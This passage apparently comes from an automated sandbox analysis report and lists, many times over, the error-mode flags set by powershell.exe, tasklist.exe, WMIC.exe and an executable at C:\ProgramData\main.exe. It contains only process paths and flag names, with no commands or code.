                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
